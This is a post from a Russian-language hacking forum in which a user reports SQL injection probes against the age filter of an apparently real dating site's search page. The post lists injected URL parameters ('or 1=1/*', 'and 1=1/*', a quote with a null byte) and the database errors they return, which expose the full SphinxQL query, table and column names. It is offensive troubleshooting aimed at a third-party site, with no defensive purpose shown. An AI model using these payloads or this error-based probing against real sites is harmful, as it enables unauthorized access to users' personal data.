Показать сообщение отдельно
Старый 20.09.2016, 18:55   #3
YuNi|[c
 
Аватар для YuNi|[c
 
Регистрация: 03.01.2011
Сообщений: 86
Репутация: 0
По умолчанию

Цитата:
Сообщение от profexer Посмотреть сообщение
Незакрытый комментарий вызывает ошибку?
на /* идет без ошибки и на ;%00 тоже
вот на OR или AND реагирует по разному:
Код:
xttp://site.com/search?a[ageFrom]=18 or 1=1/*&a[ageTo]=90&param1=value1.....paramN=value=N
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected OR, expecting $end near 'or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
Код:
xttp://site.com/search?a[ageFrom]=18 and 1=1/*&a[ageTo]=90&param1=value1.....paramN=value=N
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected CONST_INT, expecting IDENT (or 97 other tokens) near '1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 and 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
Код:
xttp://site.com/search?a[ageFrom]=18' and 456='456;%00&a[ageTo]=90&param1=value1.....paramN=value=N
Код:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected QUOTED_STRING, expecting $end near '' and 456='456;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18' and 456='456; AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
YuNi|[c вне форума   Ответить с цитированием